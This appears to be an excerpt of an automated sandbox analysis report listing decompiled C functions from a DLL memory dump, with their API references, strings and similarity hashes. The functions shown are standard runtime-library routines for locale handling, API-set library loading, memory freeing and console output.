Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: NameName::
String ID: %lf$A
API String ID: 1333004437-43661536
Opcode ID: af5549f8ebd053825763393725a35575325c911f8e7da5a7d54b3d31205b440f
Instruction ID: 6fc55e13b0884f1e0efaaaec686fc136927b07531d83ba5465a15f4193fa9005
Opcode Fuzzy Hash: af5549f8ebd053825763393725a35575325c911f8e7da5a7d54b3d31205b440f
Instruction Fuzzy Hash: 30318EB0E042589EDF24DFE8C844ADDBBB9BB0A304F10445EE4569B240D77498CAEB55

Uniqueness

Uniqueness Score: -1.00%

Function 6E19F56E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6E19F56E(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t32;
				intOrPtr _t37;
				intOrPtr _t42;
				intOrPtr _t50;
				intOrPtr _t51;
				signed int _t52;
				signed int _t57;
				void* _t60;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;
				void* _t77;
				void* _t80;

				_t77 = __eflags;
				_t60 = __edx;
				_t51 = __ecx;
				E6E1A9DF3(0x6e1ecf1e, __ebx, __edi, __esi, 0x64);
				_t50 = _t51;
				 *((intOrPtr*)(_t70 - 0x6c)) = E6E1C1229(_t60, _t80);
				_t32 = E6E19294A(_t77, _t70 - 0x68);
				_t52 = 0xb;
				_t68 = _t32;
				 *((intOrPtr*)(_t70 - 0x70)) = _t50;
				memcpy(_t70 - 0x3c, _t68, _t52 << 2);
				_t72 = _t71 + 0xc;
				_t64 = _t68 + _t52 + _t52;
				_t69 = 0;
				 *((intOrPtr*)(_t50 + 8)) = 0;
				 *((intOrPtr*)(_t50 + 0x10)) = 0;
				 *((intOrPtr*)(_t50 + 0x14)) = 0;
				 *((intOrPtr*)(_t70 - 4)) = 0;
				E6E19294A(_t77, _t70 - 0x68);
				_t78 =  *((char*)(_t70 + 0xc));
				if( *((char*)(_t70 + 0xc)) == 0) {
					_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t70 - 0x6c)) + 8));
				} else {
					_t37 = 0x6e1fc3cb;
				}
				_push(_t70 - 0x68);
				_push(_t69);
				_push(_t37);
				 *((intOrPtr*)(_t50 + 8)) = E6E184FEB(_t50, _t70 - 0x68, _t60, _t64, _t69, _t78);
				 *((intOrPtr*)(_t50 + 0x10)) = E6E198450(_t50, _t64, _t69, "false", _t69, _t70 - 0x3c);
				_t42 = E6E198450(_t50, _t64, _t69, "true", _t69, _t70 - 0x3c);
				_t73 = _t72 + 0x24;
				 *((intOrPtr*)(_t50 + 0x14)) = _t42;
				if( *((char*)(_t70 + 0xc)) == 0) {
					_t69 = _t70 - 0x3c;
					_t57 = 0xb;
					_push( *((intOrPtr*)(_t70 - 0x6c)));
					memcpy(_t73 - 0x2c, _t69, _t57 << 2);
					_t64 = _t69 + _t57 + _t57;
					_push(0);
					_t44 = E6E198242(_t50, _t50, _t69 + _t57 + _t57, _t69, __eflags);
				} else {
					 *((short*)(_t50 + 0xc)) = E6E19841F(0x2e, _t69, _t70 - 0x3c);
					 *((short*)(_t50 + 0xe)) = E6E19841F(0x2c, _t69, _t70 - 0x3c);
				}
				return E6E1A9D9D(_t44, _t50, _t64, _t69);
			}

0x6e19f56e
0x6e19f56e
0x6e19f56e
0x6e19f575
0x6e19f57a
0x6e19f581
0x6e19f588
0x6e19f58f
0x6e19f590
0x6e19f592
0x6e19f598
0x6e19f598
0x6e19f598
0x6e19f59a
0x6e19f59c
0x6e19f59f
0x6e19f5a2
0x6e19f5a8
0x6e19f5ac
0x6e19f5b1
0x6e19f5b7
0x6e19f5c3
0x6e19f5b9
0x6e19f5b9
0x6e19f5b9
0x6e19f5c9
0x6e19f5ca
0x6e19f5cb
0x6e19f5d1
0x6e19f5e3
0x6e19f5f0
0x6e19f5f5
0x6e19f5f8
0x6e19f5ff
0x6e19f629
0x6e19f62e
0x6e19f631
0x6e19f634
0x6e19f634
0x6e19f636
0x6e19f63a
0x6e19f601
0x6e19f60d
0x6e19f620
0x6e19f620
0x6e19f644

APIs

__EH_prolog3_GS.LIBCMT ref: 6E19F575
_Maklocstr.LIBCPMT ref: 6E19F5DE
_Maklocstr.LIBCPMT ref: 6E19F5F0
_Getvals.LIBCPMT ref: 6E19F63A

Strings

false, xrefs: 6E19F5D9
true, xrefs: 6E19F5EB

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Maklocstr$GetvalsH_prolog3_
String ID: false$true
API String ID: 1611767717-2658103896
Opcode ID: a87b0c469579fb5f4a31feddabedd251d438a1378be83abc892ee12255015b5a
Instruction ID: 47f7dcdf1c6d2c9f557ca67a5ae65031e22c6c65bbda4d0e5ee8ecdab874262a
Opcode Fuzzy Hash: a87b0c469579fb5f4a31feddabedd251d438a1378be83abc892ee12255015b5a
Instruction Fuzzy Hash: DC2191B2D00214ABDF04DFE5D884ADF7BACAF05714F008816B9199F141DB7095C4EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D4166, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1D4166(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x6e222298 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x6e1f5840 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E6E1CF02C(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E6E1CF02C(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x6e1d416f
0x6e1d4219
0x6e1d4177
0x6e1d4179
0x6e1d4180
0x6e1d4182
0x6e1d4188
0x6e1d4195
0x6e1d41aa
0x6e1d41ae
0x6e1d4200
0x6e1d4200
0x6e1d4205
0x6e1d4209
0x6e1d420c
0x6e1d420c
0x6e1d4212
0x6e1d4214
0x6e1d4229
0x6e1d4224
0x6e1d4228
0x6e1d4228
0x6e1d4216
0x6e1d4216
0x00000000
0x6e1d4216
0x6e1d41b0
0x6e1d41b9
0x6e1d41f0
0x6e1d41f0
0x6e1d41f2
0x6e1d41f4
0x00000000
0x00000000
0x6e1d41fc
0x00000000
0x6e1d41fc
0x6e1d41c3
0x6e1d41c8
0x6e1d41cd
0x00000000
0x00000000
0x6e1d41d7
0x6e1d41dc
0x6e1d41e1
0x00000000
0x00000000
0x6e1d41e6
0x6e1d41ec
0x00000000
0x6e1d41ec
0x6e1d418d
0x00000000
0x00000000
0x00000000
0x6e1d4193
0x6e1d4222
0x00000000

Strings

api-ms-, xrefs: 6E1D41BD
ext-ms-, xrefs: 6E1D41D1

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 4fb97407b0a3c34f8414789003f61b9c491fa70fb217c4229f8d5b9c1350e6c3
Instruction ID: 34f62d6f2db5b71fbb03b47f6797b5c380bd8d9d2bb90131f4fbf084fc5808dd
Opcode Fuzzy Hash: 4fb97407b0a3c34f8414789003f61b9c491fa70fb217c4229f8d5b9c1350e6c3
Instruction Fuzzy Hash: 4921EB36A45622EBDB1187E5AC44B0E3BA89F26760F214610FD21F7280D730FD86A5E1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DE2D8, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1DE2D8(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E6E1DDFC3(_t45, 7);
					E6E1DDFC3(_t45 + 0x1c, 7);
					E6E1DDFC3(_t45 + 0x38, 0xc);
					E6E1DDFC3(_t45 + 0x68, 0xc);
					E6E1DDFC3(_t45 + 0x98, 2);
					E6E1D1BE4( *((intOrPtr*)(_t45 + 0xa0)));
					E6E1D1BE4( *((intOrPtr*)(_t45 + 0xa4)));
					E6E1D1BE4( *((intOrPtr*)(_t45 + 0xa8)));
					E6E1DDFC3(_t45 + 0xb4, 7);
					E6E1DDFC3(_t45 + 0xd0, 7);
					E6E1DDFC3(_t45 + 0xec, 0xc);
					E6E1DDFC3(_t45 + 0x11c, 0xc);
					E6E1DDFC3(_t45 + 0x14c, 2);
					E6E1D1BE4( *((intOrPtr*)(_t45 + 0x154)));
					E6E1D1BE4( *((intOrPtr*)(_t45 + 0x158)));
					E6E1D1BE4( *((intOrPtr*)(_t45 + 0x15c)));
					return E6E1D1BE4( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x6e1de2de
0x6e1de2e3
0x6e1de2ec
0x6e1de2f7
0x6e1de302
0x6e1de30d
0x6e1de31b
0x6e1de326
0x6e1de331
0x6e1de33c
0x6e1de34a
0x6e1de358
0x6e1de369
0x6e1de377
0x6e1de385
0x6e1de390
0x6e1de39b
0x6e1de3a6
0x00000000
0x6e1de3b6
0x6e1de3bb

APIs

Part of subcall function 6E1DDFC3: _free.LIBCMT ref: 6E1DDFE8

_free.LIBCMT ref: 6E1DE326

Part of subcall function 6E1D1BE4: HeapFree.KERNEL32(00000000,00000000,?,6E1DDFED,?,00000000,?,?,?,6E1DE2F1,?,00000007,?,?,6E1DD69F,?), ref: 6E1D1BFA
Part of subcall function 6E1D1BE4: GetLastError.KERNEL32(?,?,6E1DDFED,?,00000000,?,?,?,6E1DE2F1,?,00000007,?,?,6E1DD69F,?,?), ref: 6E1D1C0C

_free.LIBCMT ref: 6E1DE331
_free.LIBCMT ref: 6E1DE33C
_free.LIBCMT ref: 6E1DE390
_free.LIBCMT ref: 6E1DE39B
_free.LIBCMT ref: 6E1DE3A6
_free.LIBCMT ref: 6E1DE3B1

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ae654fae5267e194d9c327c9aa7d6a00b638f2bb0d6670459258e460656f4524
Instruction ID: 8d985f29430bbb847fd5d4d980815587a6152d15b3079a6d425be003bdb9ba02
Opcode Fuzzy Hash: ae654fae5267e194d9c327c9aa7d6a00b638f2bb0d6670459258e460656f4524
Instruction Fuzzy Hash: ED115E71A44B04BAD620EBF4CC85FCBB7ECAF0074CF400D16A299A6091EB75B59DAE50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D53C9, Relevance: 9.3, APIs: 6, Instructions: 318
fileCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E6E1D53C9(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0, void* _a4, signed int _a8, long _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				long _v44;
				char _v47;
				void _v48;
				intOrPtr _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _v92;
				long _v96;
				long _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				long _v112;
				void* _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				signed int _t172;
				signed int _t174;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				long _t202;
				void* _t206;
				intOrPtr _t212;
				signed char* _t213;
				char _t216;
				signed int _t219;
				char* _t220;
				void* _t222;
				long _t228;
				intOrPtr _t229;
				char _t231;
				long _t235;
				struct _OVERLAPPED* _t243;
				signed int _t247;
				intOrPtr _t250;
				signed int _t253;
				signed int _t254;
				signed int _t256;
				struct _OVERLAPPED* _t257;
				intOrPtr _t259;
				void* _t263;
				long _t264;
				signed char _t265;
				signed int _t266;
				void* _t267;
				void* _t269;
				struct _OVERLAPPED* _t270;
				long _t271;
				signed int _t272;
				long _t276;
				signed int _t280;
				long _t281;
				struct _OVERLAPPED* _t282;
				signed int _t284;
				intOrPtr _t286;
				signed int _t289;
				signed int _t292;
				long _t293;
				long _t294;
				signed int _t295;
				intOrPtr _t296;
				signed int _t298;
				signed int _t300;
				void* _t301;
				void* _t303;

				_t328 = __fp0;
				_t298 = _t300;
				_t301 = _t300 - 0x8c;
				_t172 =  *0x6e21801c; // 0x57d971a9
				_v8 = _t172 ^ _t298;
				_t174 = _a8;
				_t264 = _a12;
				_t284 = (_t174 & 0x0000003f) * 0x38;
				_t247 = _t174 >> 6;
				_v112 = _t264;
				_v84 = _t247;
				_v80 = _t284;
				_t286 = _a16 + _t264;
				_v116 =  *((intOrPtr*)(_t284 +  *((intOrPtr*)(0x6e222090 + _t247 * 4)) + 0x18));
				_v104 = _t286;
				_t178 = GetConsoleCP();
				_t243 = 0;
				_v124 = _t178;
				E6E1B5F9E( &_v72, _t264, __fp0, 0);
				asm("stosd");
				_t250 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t250;
				asm("stosd");
				asm("stosd");
				_t276 = _v112;
				_v40 = _t276;
				if(_t276 >= _t286) {
					L53:
					__eflags = _v60 - _t243;
				} else {
					_t289 = _v92;
					while(1) {
						_v47 =  *_t276;
						_v76 = _t243;
						_v44 = 1;
						_t186 =  *((intOrPtr*)(0x6e222090 + _v84 * 4));
						_v52 = _t186;
						if(_t250 != 0xfde9) {
							goto L24;
						}
						_t266 = _v80;
						_t212 = _t186 + 0x2e + _t266;
						_t257 = _t243;
						_v108 = _t212;
						while( *((intOrPtr*)(_t212 + _t257)) != _t243) {
							_t257 =  &(_t257->Internal);
							if(_t257 < 5) {
								continue;
							}
							break;
						}
						_t213 = _v40;
						_t280 = _v104 - _t213;
						_v44 = _t257;
						if(_t257 <= 0) {
							_t259 =  *((char*)(( *_t213 & 0x000000ff) + 0x6e2182a0)) + 1;
							_v52 = _t259;
							__eflags = _t259 - _t280;
							if(_t259 > _t280) {
								__eflags = _t280;
								if(_t280 <= 0) {
									goto L45;
								} else {
									_t293 = _v40;
									do {
										_t267 = _t266 + _t243;
										_t216 =  *((intOrPtr*)(_t243 + _t293));
										_t243 =  &(_t243->Internal);
										 *((char*)(_t267 +  *((intOrPtr*)(0x6e222090 + _v84 * 4)) + 0x2e)) = _t216;
										_t266 = _v80;
										__eflags = _t243 - _t280;
									} while (_t243 < _t280);
									goto L44;
								}
							} else {
								_t281 = _v40;
								__eflags = _t259 - 4;
								_v144 = _t243;
								_t261 =  &_v144;
								_v140 = _t243;
								_v56 = _t281;
								_t219 = (0 | _t259 == 0x00000004) + 1;
								__eflags = _t219;
								_push( &_v144);
								_v44 = _t219;
								_push(_t219);
								_t220 =  &_v56;
								goto L22;
							}
						} else {
							_t228 =  *((char*)(( *(_t266 + _v52 + 0x2e) & 0x000000ff) + 0x6e2182a0)) + 1;
							_v56 = _t228;
							_t229 = _t228 - _t257;
							_v52 = _t229;
							if(_t229 > _t280) {
								__eflags = _t280;
								if(_t280 > 0) {
									_t294 = _v40;
									do {
										_t269 = _t266 + _t243 + _t257;
										_t231 =  *((intOrPtr*)(_t243 + _t294));
										_t243 =  &(_t243->Internal);
										 *((char*)(_t269 +  *((intOrPtr*)(0x6e222090 + _v84 * 4)) + 0x2e)) = _t231;
										_t257 = _v44;
										_t266 = _v80;
										__eflags = _t243 - _t280;
									} while (_t243 < _t280);
									L44:
									_t289 = _v92;
								}
								L45:
								_t292 = _t289 + _t280;
								__eflags = _t292;
								L46:
								__eflags = _v60;
								_v92 = _t292;
							} else {
								_t270 = _t243;
								if(_t257 > 0) {
									_t296 = _v108;
									do {
										 *((char*)(_t298 + _t270 - 0xc)) =  *((intOrPtr*)(_t296 + _t270));
										_t270 =  &(_t270->Internal);
									} while (_t270 < _t257);
									_t229 = _v52;
								}
								_t281 = _v40;
								if(_t229 > 0) {
									E6E1AB380( &_v16 + _t257, _t281, _v52);
									_t257 = _v44;
									_t301 = _t301 + 0xc;
								}
								if(_t257 > 0) {
									_t271 = _v44;
									_t282 = _t243;
									_t295 = _v80;
									do {
										_t263 = _t295 + _t282;
										_t282 =  &(_t282->Internal);
										 *(_t263 +  *((intOrPtr*)(0x6e222090 + _v84 * 4)) + 0x2e) = _t243;
									} while (_t282 < _t271);
									_t281 = _v40;
								}
								_v136 = _t243;
								_v120 =  &_v16;
								_t261 =  &_v136;
								_v132 = _t243;
								_push( &_v136);
								_t235 = (0 | _v56 == 0x00000004) + 1;
								_v44 = _t235;
								_push(_t235);
								_t220 =  &_v120;
								L22:
								_push(_t220);
								_push( &_v76);
								_t222 = E6E1DFAFE(_t261);
								_t303 = _t301 + 0x10;
								if(_t222 == 0xffffffff) {
									goto L53;
								} else {
									_t276 = _t281 + _v52 - 1;
									L32:
									_t276 = _t276 + 1;
									_v40 = _t276;
									_t193 = E6E1DA0C8(_v124, _t243,  &_v76, _v44,  &_v32, 5, _t243, _t243);
									_t301 = _t303 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L53;
									} else {
										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t243) == 0) {
											L52:
											_v96 = GetLastError();
											goto L53;
										} else {
											_t289 = _v88 - _v112 + _t276;
											_v92 = _t289;
											if(_v100 < _v56) {
												goto L53;
											} else {
												if(_v47 != 0xa) {
													L39:
													if(_t276 >= _v104) {
														goto L53;
													} else {
														_t250 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v48 = _t198;
													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t243) == 0) {
														goto L52;
													} else {
														if(_v100 < 1) {
															goto L53;
														} else {
															_v88 = _v88 + 1;
															_t289 = _t289 + 1;
															_v92 = _t289;
															goto L39;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L54;
						L24:
						_t253 = _v80;
						_t265 =  *((intOrPtr*)(_t253 + _t186 + 0x2d));
						__eflags = _t265 & 0x00000004;
						if((_t265 & 0x00000004) == 0) {
							_v33 =  *_t276;
							_t188 = E6E1C4C70(_t265, _t328);
							_t254 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t254 * 2)) - _t243;
							if( *((intOrPtr*)(_t188 + _t254 * 2)) >= _t243) {
								_push(1);
								_push(_t276);
								goto L31;
							} else {
								_t202 = _t276 + 1;
								_v56 = _t202;
								__eflags = _t202 - _v104;
								if(_t202 >= _v104) {
									_t272 = _v84;
									_t256 = _v80;
									 *((char*)(_t256 +  *((intOrPtr*)(0x6e222090 + _t272 * 4)) + 0x2e)) = _v33;
									 *(_t256 +  *((intOrPtr*)(0x6e222090 + _t272 * 4)) + 0x2d) =  *(_t256 +  *((intOrPtr*)(0x6e222090 + _t272 * 4)) + 0x2d) | 0x00000004;
									_t292 = _t289 + 1;
									goto L46;
								} else {
									_t206 = E6E1D1DAE( &_v76, _t276, 2);
									_t303 = _t301 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L53;
									} else {
										_t276 = _v56;
										goto L32;
									}
								}
							}
						} else {
							_v24 =  *((intOrPtr*)(_t253 + _t186 + 0x2e));
							_v23 =  *_t276;
							_push(2);
							 *(_t253 + _v52 + 0x2d) = _t265 & 0x000000fb;
							_push( &_v24);
							L31:
							_push( &_v76);
							_t190 = E6E1D1DAE();
							_t303 = _t301 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L53;
							} else {
								goto L32;
							}
						}
						goto L54;
					}
				}
				L54:
				if(__eflags != 0) {
					_t183 = _v72;
					_t167 = _t183 + 0x350;
					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t167;
				}
				__eflags = _v8 ^ _t298;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E6E1A93EA(_v8 ^ _t298);
			}

0x6e1d53c9
0x6e1d53cc
0x6e1d53ce
0x6e1d53d4
0x6e1d53db
0x6e1d53de
0x6e1d53e3
0x6e1d53eb
0x6e1d53ee
0x6e1d53f2
0x6e1d53f5
0x6e1d53ff
0x6e1d5409
0x6e1d540b
0x6e1d540e
0x6e1d5411
0x6e1d5417
0x6e1d5419
0x6e1d5420
0x6e1d542d
0x6e1d542e
0x6e1d5431
0x6e1d5434
0x6e1d5435
0x6e1d5436
0x6e1d5439
0x6e1d543e
0x6e1d574a
0x6e1d574a
0x6e1d5444
0x6e1d5444
0x6e1d5447
0x6e1d5449
0x6e1d544f
0x6e1d5452
0x6e1d5459
0x6e1d5460
0x6e1d5469
0x00000000
0x00000000
0x6e1d546f
0x6e1d5475
0x6e1d5477
0x6e1d5479
0x6e1d547c
0x6e1d5481
0x6e1d5485
0x00000000
0x00000000
0x00000000
0x6e1d5485
0x6e1d548a
0x6e1d548d
0x6e1d548f
0x6e1d5494
0x6e1d5546
0x6e1d5547
0x6e1d554a
0x6e1d554c
0x6e1d56fa
0x6e1d56fc
0x00000000
0x6e1d56fe
0x6e1d56fe
0x6e1d5701
0x6e1d5704
0x6e1d570d
0x6e1d5710
0x6e1d5711
0x6e1d5715
0x6e1d5718
0x6e1d5718
0x00000000
0x6e1d571c
0x6e1d5552
0x6e1d5552
0x6e1d5557
0x6e1d555a
0x6e1d5560
0x6e1d5566
0x6e1d556f
0x6e1d5572
0x6e1d5572
0x6e1d5573
0x6e1d5574
0x6e1d5577
0x6e1d5578
0x00000000
0x6e1d5578
0x6e1d549a
0x6e1d54a9
0x6e1d54aa
0x6e1d54ad
0x6e1d54af
0x6e1d54b4
0x6e1d56c5
0x6e1d56c7
0x6e1d56c9
0x6e1d56cc
0x6e1d56d1
0x6e1d56da
0x6e1d56dd
0x6e1d56de
0x6e1d56e2
0x6e1d56e5
0x6e1d56e8
0x6e1d56e8
0x6e1d56ec
0x6e1d56ec
0x6e1d56ec
0x6e1d56ef
0x6e1d56ef
0x6e1d56ef
0x6e1d56f1
0x6e1d56f1
0x6e1d56f5
0x6e1d54ba
0x6e1d54ba
0x6e1d54be
0x6e1d54c0
0x6e1d54c3
0x6e1d54c6
0x6e1d54ca
0x6e1d54cb
0x6e1d54cf
0x6e1d54cf
0x6e1d54d2
0x6e1d54d7
0x6e1d54e3
0x6e1d54e8
0x6e1d54eb
0x6e1d54eb
0x6e1d54f0
0x6e1d54f2
0x6e1d54f5
0x6e1d54f7
0x6e1d54fa
0x6e1d54fd
0x6e1d5500
0x6e1d5508
0x6e1d550c
0x6e1d5510
0x6e1d5510
0x6e1d5516
0x6e1d551c
0x6e1d551f
0x6e1d5527
0x6e1d552e
0x6e1d5532
0x6e1d5533
0x6e1d5536
0x6e1d5537
0x6e1d557b
0x6e1d557b
0x6e1d557f
0x6e1d5580
0x6e1d5585
0x6e1d558b
0x00000000
0x6e1d5591
0x6e1d5595
0x6e1d561e
0x6e1d5625
0x6e1d562d
0x6e1d5635
0x6e1d563a
0x6e1d563d
0x6e1d5642
0x00000000
0x6e1d5648
0x6e1d565d
0x6e1d5741
0x6e1d5747
0x00000000
0x6e1d5663
0x6e1d566c
0x6e1d566e
0x6e1d5674
0x00000000
0x6e1d567a
0x6e1d567e
0x6e1d56b4
0x6e1d56b7
0x00000000
0x6e1d56bd
0x6e1d56bd
0x00000000
0x6e1d56bd
0x6e1d5680
0x6e1d5682
0x6e1d5684
0x6e1d569d
0x00000000
0x6e1d56a3
0x6e1d56a7
0x00000000
0x6e1d56ad
0x6e1d56ad
0x6e1d56b0
0x6e1d56b1
0x00000000
0x6e1d56b1
0x6e1d56a7
0x6e1d569d
0x6e1d567e
0x6e1d5674
0x6e1d565d
0x6e1d5642
0x6e1d558b
0x6e1d54b4
0x00000000
0x6e1d559c
0x6e1d559c
0x6e1d559f
0x6e1d55a3
0x6e1d55a6
0x6e1d55c8
0x6e1d55cb
0x6e1d55d0
0x6e1d55d4
0x6e1d55d8
0x6e1d5606
0x6e1d5608
0x00000000
0x6e1d55da
0x6e1d55da
0x6e1d55dd
0x6e1d55e0
0x6e1d55e3
0x6e1d571e
0x6e1d5721
0x6e1d572e
0x6e1d5739
0x6e1d573e
0x00000000
0x6e1d55e9
0x6e1d55f0
0x6e1d55f5
0x6e1d55f8
0x6e1d55fb
0x00000000
0x6e1d5601
0x6e1d5601
0x00000000
0x6e1d5601
0x6e1d55fb
0x6e1d55e3
0x6e1d55a8
0x6e1d55af
0x6e1d55b4
0x6e1d55ba
0x6e1d55bc
0x6e1d55c3
0x6e1d5609
0x6e1d560c
0x6e1d560d
0x6e1d5612
0x6e1d5615
0x6e1d5618
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1d5618
0x00000000
0x6e1d55a6
0x6e1d5447
0x6e1d574d
0x6e1d574d
0x6e1d574f
0x6e1d5752
0x6e1d5752
0x6e1d5752
0x6e1d5752
0x6e1d5764
0x6e1d5766
0x6e1d5767
0x6e1d5768
0x6e1d5772

APIs

GetConsoleCP.KERNEL32(00000000,00000001,00000000), ref: 6E1D5411
__fassign.LIBCMT ref: 6E1D55F0
__fassign.LIBCMT ref: 6E1D560D
WriteFile.KERNEL32(?,6E1C2E1A,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E1D5655
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E1D5695
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E1D5741

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: b7e779b970067d5abfd267b51e3719aeb146b7202222dc2dd6241404932d1da8
Instruction ID: 5e5911a02bd67ebea16ac4180e6ddf3bb91ad46e4180775bd0cf9632d6113777
Opcode Fuzzy Hash: b7e779b970067d5abfd267b51e3719aeb146b7202222dc2dd6241404932d1da8
Instruction Fuzzy Hash: 5BD1A971D00259DFDB11CFE8C8909EDBBB6FF49314F24415AE855BB241E730AA8ADB50

Uniqueness

Uniqueness Score: -1.00%

